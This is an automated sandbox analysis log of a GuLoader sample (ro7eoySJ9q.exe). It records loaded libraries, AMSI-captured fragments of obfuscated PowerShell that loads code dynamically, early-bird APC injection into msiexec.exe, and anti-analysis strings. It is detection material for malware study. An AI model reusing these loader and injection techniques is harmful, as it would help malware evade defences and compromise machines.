      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: ro7eoySJ9q.exeStatic file information: File size 1060792 > 1048576
      Source: Binary string: re.pdbro source: powershell.exe, 00000002.00000002.2706703268.0000000007ED2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2706703268.0000000007ED2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2696055042.0000000006BFD000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000006.00000002.3928284936.000000000461B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2707883561.000000000985B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Udstyrsforretningerne $Reheeling218rnevold20 $Rettergangens), (Dagafsnit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bfsandwichs = [AppDomain]::Current
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Thyboer)), $Pippede).DefineDynamicModule($Slutvrdiernes, $false).DefineType($Ges, $Unpolishedness, [System.MulticastDelegate])$Projekt
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_040AA1F0 push esp; ret 2_2_040AAA01
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_040AD700 push eax; iretd 2_2_040AD701
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06E11609 push eax; mov dword ptr [esp], edx2_2_06E1161C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06E1B9CF push es; ret 2_2_06E1B9E0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F80FC4 push es; iretd 2_2_06F80FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F84AE2 push ebx; retf 2_2_06F84AE4
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F84B41 push edx; retf 2_2_06F84B43
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F8E088 pushfd ; ret 2_2_06F8E3E5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F8E010 push esp; ret 2_2_06F8E02D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7745Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1902Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 5136Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004DBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\]q
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004DBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\]q
      Source: msiexec.exe, 00000006.00000003.2955279363.00000000094E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: msiexec.exe, 00000006.00000003.2955279363.00000000094E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004DBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\]q
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeAPI call chain: ExitProcess graph end nodegraph_0-3121
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeAPI call chain: ExitProcess graph end nodegraph_0-3127
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_008CF520 LdrInitializeThunk,LdrInitializeThunk,2_2_008CF520
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3AE0000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
